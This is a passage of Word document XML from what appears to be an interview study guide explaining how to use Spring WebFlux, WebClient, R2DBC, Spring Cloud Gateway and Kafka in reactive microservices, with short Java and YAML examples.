          <v:rect id="_x0000_i2374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="242774E5" w14:textId="0C5204BE"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38" w:name="_Toc196308018"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain how you would use Spring WebFlux in a microservice architecture</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538"/>
    </w:p>
    <w:p w14:paraId="6EC1BC04" w14:textId="31686EA9" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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Yes. Here's how </w:t>
      </w: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xml:space="preserve"> fits into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservice architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956D95F" w14:textId="77777777" w:rsidR="008D7081"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899A9AF">
          <v:rect id="_x0000_i2375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DDC4FD" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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1. Reactive Microservice Design with WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDAEF95"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n microservices, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>each service handles a specific business responsibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, each service can be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33260085"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Non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEBC8A"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calable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3EC41"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ightweight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B1F3A"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active from controller to DB/API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF9D4F3" w14:textId="77777777" w:rsidR="008D7081"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A0F8F91">
          <v:rect id="_x0000_i2376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B692A" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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2. Reactive Communication Between Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE1F8A"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in one service to call another:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCBC36"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD3D9A"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rivate WebClient.Builder webClientBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC142EA" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A310284"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Mono&lt;User&gt; getUser(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A774B"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webClientBuilder.build()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF3CF4"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et()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D24C23"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uri("http://user-service/users/{id}", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF98FC"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CACD9"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bodyToMono(User.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FEE9A"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205167C2"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void RestTemplate – it's blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0640D6"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Eureka/Consul) for dynamic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F236E6" w14:textId="77777777" w:rsidR="008D7081"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038439">
          <v:rect id="_x0000_i2377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730D16C" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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3. Reactive Persistence Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEFB18"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PostgreSQL, MySQL) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353AB60"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void JDBC or Hibernate (they block threads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE24BAD"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interface UserRepository extends ReactiveCrudRepository&lt;User, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E28D4"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Flux&lt;User&gt; findByAgeGreaterThan(int age);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F125F6"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0349F2C9" w14:textId="77777777" w:rsidR="008D7081"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BF42A50">
          <v:rect id="_x0000_i2378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3C723" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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4. API Gateway Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B5373"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is based on WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D2311"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active routing, rate limiting, authentication at edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7172C"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130BE36"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cloud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE058C"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gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D277CDC"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outes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDFC2E"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id: user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF05F15"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uri: lb://USER-SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C7189"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predicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C647E"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Path=/users/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4819CE" w14:textId="77777777" w:rsidR="008D7081"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1083454">
          <v:rect id="_x0000_i2379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5812BA31" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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5. Event-Driven Communication (Async)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DD924"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</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RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for async events between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34003722"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ntegrate with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor Kafka</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Spring Cloud Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reactive support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FF343" w14:textId="77777777" w:rsidR="008D7081"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2CC4F42">
          <v:rect id="_x0000_i2380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21341800" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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6. Chaining Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689767D"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You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain service calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using reactive operators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429385FB"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Mono&lt;OrderResponse&gt; placeOrder(OrderRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087CF97"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nventoryService.checkInventory(request.getItemId())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533B2CA"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flatMap(isAvailable -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5ECE8C"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if (isAvailable) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F267832"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paymentService.processPayment(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DDFDDE"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60F01D"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Mono.error(new RuntimeException("Out of stock"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8406E"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51FCA921"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F149DA"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17AB1B7F" w14:textId="77777777" w:rsidR="008D7081"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3098187">
          <v:rect id="_x0000_i2381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A8ED0" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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7. Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39557377"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se:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B7506"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ebTestClient for controller/integration testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A052405"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tepVerifier for service layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243C089"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ockito or @MockBean for mocking dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E371D" w14:textId="77777777" w:rsidR="008D7081"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EBAD6E9">
          <v:rect id="_x0000_i2382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D52A3A" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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8. Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1D2FA"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Prometheus/Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7ADD7"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Trace with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sleuth + Zipkin</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OpenTelemetry</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64F5F5" w14:textId="77777777" w:rsidR="008D7081"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0D36B55">
          <v:rect id="_x0000_i2383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CA494" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B827CE2"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 WebFlux helps microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FDD003"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Handle high concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21A87B"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tay responsive under load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394942A9"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ntegrate with async systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F2E47" w14:textId="77777777" w:rsidR="008D7081" w:rsidRPr="00B13F85" w:rsidRDefault="008D7081"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mprove resource usage via event-loop model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70E17D" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00CE4B95"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B63728C">
          <v:rect id="_x0000_i2384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E872CA3" w14:textId="34C7CC55" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="00163F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="_Toc196308019"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use reactive programming to integrate microservices</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p w14:paraId="078D4E0E" w14:textId="2012D90E" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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You can integrate microservices using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, efficient, and scalable communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between services. Here’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how you can do it step-by-step</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F814ED" w14:textId="77777777" w:rsidR="00413852"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DCB9F37">
          <v:rect id="_x0000_i2385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12479786" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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1. Use WebClient for Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CB7D6"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ebClient is the reactive, non-blocking HTTP client in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34756383"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1677591B"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA22357"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rivate WebClient.Builder webClientBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632CC33" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D0834A"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Mono&lt;User&gt; getUserById(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4981A8"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webClientBuilder.build()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFFC05A"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 xml:space="preserve">        .get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078330FD"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uri("http://user-service/users/{id}", userId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB09CA"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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB366D9"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bodyToMono(User.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707D4BDA"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11D3CCCE"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orks well with load balancers (lb://) via Spring Cloud LoadBalancer or Eureka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0564AFD0"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Doesn't block threads like RestTemplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B98227" w14:textId="77777777" w:rsidR="00413852"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7A7EFCD">
          <v:rect id="_x0000_i2386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2BF80" w14:textId="77777777" w:rsidR="00413852" w:rsidRPr="00B13F85" w:rsidRDefault="00413852"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2. Chain Service Calls with Mono/Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47396738"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If one microservice depends on responses from others, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chain calls reactively</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039B866"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example (Order Service calling Inventory + Payment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163C77E"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Mono&lt;OrderResponse&gt; placeOrder(OrderRequest request) {</w:t>
      </w:r>
    </w:p>
